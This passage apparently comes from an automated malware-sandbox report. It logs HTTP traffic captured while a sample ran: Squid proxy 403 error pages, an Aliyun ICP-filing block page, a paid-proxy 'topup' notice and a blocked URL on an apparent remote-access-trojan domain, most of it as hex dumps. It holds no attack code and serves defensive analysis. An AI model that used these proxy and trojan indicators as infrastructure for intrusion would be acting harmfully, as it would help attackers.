Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:19 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:19 GMTContent-Type: text/html;charset=utf-8Content-Length: 952X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 53
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.20Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:19 GMTContent-Type: text/html;charset=utf-8Content-Length: 3661X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from ezproxies.comX-Cache-Lookup: NONE from ezproxies.com:58378Via: 1.1 ezproxies.com (squid/3.5.20)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:19 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:20 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:19 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:19 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:20 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:20 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 